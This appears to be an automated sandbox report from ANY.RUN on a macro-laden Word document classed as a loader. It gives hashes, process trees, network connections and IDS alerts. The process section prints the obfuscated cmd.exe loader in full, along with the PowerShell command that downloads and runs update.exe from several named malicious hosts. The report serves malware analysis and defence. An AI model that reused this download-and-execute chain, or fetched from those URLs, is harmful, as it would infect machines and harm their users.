analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

MpuXNwmE.doc

Full analysis: https://app.any.run/tasks/a7dacecf-5d68-4e9e-bf7d-da93d93088d1
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 18, 2018, 11:06:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 17 10:22:00 2018, Last Saved Time/Date: Mon Dec 17 10:22:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 28, Security: 0
MD5:

27B71DD0C0FD5C8DCE6EBE569DE73988

SHA1:

851E6358E5E527F37B974FE0CEF2096451B948ED

SHA256:

D7F613D91810C7C5800DBAF880B8200D90DDD08F0EAC50D1B6E19B0E72C75EFE

SSDEEP:

1536:J0nbUhdKKnso8MU71LE/fqW2X49wSTBoVRJ3FT0ab+a9:J0nbUhdKKnsovU2V9SSwJd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2972)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2972)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2276)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2188)
    • Application was dropped or rewritten from another process

      • 280.exe (PID: 3656)
    • Uses SVCHOST.EXE for hidden code execution

      • 280.exe (PID: 3656)
    • Loads the Task Scheduler COM API

      • svchost.exe (PID: 2592)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3748)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2188)
      • svchost.exe (PID: 2592)
    • Creates files in the user directory

      • powershell.exe (PID: 2188)
    • Creates files in the program directory

      • svchost.exe (PID: 2592)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2972)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:17 10:22:00
ModifyDate: 2018:12:17 10:22:00
Pages: 1
Words: 4
Characters: 28
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 31
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 280.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
2972"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\MpuXNwmE.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3748c:\VimUCsu\ITVjHOXmPzMqJ\CpSZdwXkIp\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set cLhj=FkjGzRSvWLjbstKYzUiHFdXMzkTZuC@a}qc\PrN l;:'(p./+={)0hw2nEBDfoygeQmIx8$-,&&for %f in (70,57,8,36,49,43,25,18,19,43,41,70,21,22,31,49,56,64,54,71,61,11,10,64,34,13,39,38,64,13,46,8,64,11,29,40,18,64,56,13,41,70,17,6,36,49,43,53,13,13,45,42,47,47,34,64,12,13,64,56,64,40,40,64,12,46,10,31,25,61,11,12,61,56,46,60,37,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,12,45,31,37,25,61,40,7,18,21,64,61,46,33,61,18,62,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,54,61,66,31,56,46,33,61,18,62,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,12,31,18,13,56,64,54,12,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,43,46,6,45,40,18,13,44,43,30,43,51,41,70,11,22,58,49,43,38,54,56,43,41,70,40,24,6,39,49,39,43,55,69,52,43,41,70,53,67,3,49,43,65,11,67,43,41,70,24,19,67,49,70,64,56,7,42,13,64,66,45,48,43,35,43,48,70,40,24,6,48,43,46,64,68,64,43,41,60,61,37,64,31,34,53,44,70,6,53,60,39,18,56,39,70,17,6,36,51,50,13,37,62,50,70,21,22,31,46,59,61,54,56,40,61,31,21,20,18,40,64,44,70,6,53,60,72,39,70,24,19,67,51,41,70,61,38,37,49,43,54,40,54,43,41,67,60,39,44,44,3,64,13,71,67,13,64,66,39,70,24,19,67,51,46,40,64,56,63,13,53,39,71,63,64,39,69,52,52,52,52,51,39,50,67,56,7,61,25,64,71,67,13,64,66,39,70,24,19,67,41,70,19,23,19,49,43,33,36,33,43,41,11,37,64,31,25,41,32,32,34,31,13,34,53,50,32,32,70,67,57,7,49,43,25,7,29,43,41,83)do set Vnb9=!Vnb9!!cLhj:~%f,1!&&if %f equ 83 powershell.exe "!Vnb9:~-457!""c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2276CmD /V:ON/C"set cLhj=FkjGzRSvWLjbstKYzUiHFdXMzkTZuC@a}qc\PrN l;:'(p./+={)0hw2nEBDfoygeQmIx8$-,&&for %f in (70,57,8,36,49,43,25,18,19,43,41,70,21,22,31,49,56,64,54,71,61,11,10,64,34,13,39,38,64,13,46,8,64,11,29,40,18,64,56,13,41,70,17,6,36,49,43,53,13,13,45,42,47,47,34,64,12,13,64,56,64,40,40,64,12,46,10,31,25,61,11,12,61,56,46,60,37,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,12,45,31,37,25,61,40,7,18,21,64,61,46,33,61,18,62,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,54,61,66,31,56,46,33,61,18,62,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,12,31,18,13,56,64,54,12,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,43,46,6,45,40,18,13,44,43,30,43,51,41,70,11,22,58,49,43,38,54,56,43,41,70,40,24,6,39,49,39,43,55,69,52,43,41,70,53,67,3,49,43,65,11,67,43,41,70,24,19,67,49,70,64,56,7,42,13,64,66,45,48,43,35,43,48,70,40,24,6,48,43,46,64,68,64,43,41,60,61,37,64,31,34,53,44,70,6,53,60,39,18,56,39,70,17,6,36,51,50,13,37,62,50,70,21,22,31,46,59,61,54,56,40,61,31,21,20,18,40,64,44,70,6,53,60,72,39,70,24,19,67,51,41,70,61,38,37,49,43,54,40,54,43,41,67,60,39,44,44,3,64,13,71,67,13,64,66,39,70,24,19,67,51,46,40,64,56,63,13,53,39,71,63,64,39,69,52,52,52,52,51,39,50,67,56,7,61,25,64,71,67,13,64,66,39,70,24,19,67,41,70,19,23,19,49,43,33,36,33,43,41,11,37,64,31,25,41,32,32,34,31,13,34,53,50,32,32,70,67,57,7,49,43,25,7,29,43,41,83)do set Vnb9=!Vnb9!!cLhj:~%f,1!&&if %f equ 83 powershell.exe "!Vnb9:~-457!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2188powershell.exe "$EWP='kiH';$dXa=new-object Net.WebClient;$USP='http://cestenelles.jakobson.fr/ttt/update.exe@http://www.sparkolvideo.qoiy.ru/ttt/update.exe@http://www.woman.qoiy.ru/ttt/update.exe@http://www.saitnews.ru/ttt/update.exe'.Split('@');$bXB='Nwn';$lzS = '280';$hIG='QbI';$zHI=$env:temp+'\'+$lzS+'.exe';foreach($Shf in $USP){try{$dXa.DownloadFile($Shf, $zHI);$oNr='wlw';If ((Get-Item $zHI).length -ge 80000) {Invoke-Item $zHI;$HMH='qPq';break;}}catch{}}$IEv='kvC';"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3656"C:\Users\admin\AppData\Local\Temp\280.exe" C:\Users\admin\AppData\Local\Temp\280.exe
powershell.exe
User:
admin
Company:
NeoGov Either
Integrity Level:
MEDIUM
Description:
Miletalk
Exit code:
0
Version:
2.0.75.58
2592C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe
280.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Host Process for Windows Services
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 667
Read events
1 193
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
7

Dropped files

PID
Process
Filename
Type
2972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6B9B.tmp.cvr
MD5:
SHA256:
2972WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19290503.wmf
MD5:
SHA256:
2972WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7A2C909.wmf
MD5:
SHA256:
2188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4BDU9Y4WWK89Y3FNHXPZ.temp
MD5:
SHA256:
2188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2972WINWORD.EXEC:\Users\admin\Desktop\~$uXNwmE.docpgc
MD5:B3EEA616DC7D8CA4B7130D8F71AAFECB
SHA256:CD34204203CAF226C1D020F98CCD2F93033C1CECAC379C9B1F7E68B389FDBF2F
2188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247ee5.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:1ED6700DEB8D8D9BE2A7D819D1B5F7C6
SHA256:001B74A0C23DBACF4D2CA2CF5ABCCA24D5AB7D7A522632FF77F10A5E904479A1
2972WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D4098A8A.wmfwmf
MD5:FF5E656EC09ADFA7464D508DC17DA72F
SHA256:44853892790E2CF8C888B9B2703B6CED41D6E0E22706E57326BD691C8CE1066F
2972WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\MpuXNwmE.doc.LNKlnk
MD5:53CA26F489290A1E6D78E5C66BAFD011
SHA256:49FD9F8606E7CE097630759B02A7E1D647B0B6E201012F79A4BDCF9269B22E66
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2188
powershell.exe
GET
200
213.186.33.24:80
http://cestenelles.jakobson.fr/ttt/update.exe
FR
executable
265 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2188
powershell.exe
213.186.33.24:80
cestenelles.jakobson.fr
OVH SAS
FR
malicious

DNS requests

Domain
IP
Reputation
cestenelles.jakobson.fr
  • 213.186.33.24
malicious

Threats

PID
Process
Class
Message
2188
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2188
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2188
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
Process
Message
280.exe
Start
280.exe
Stop ok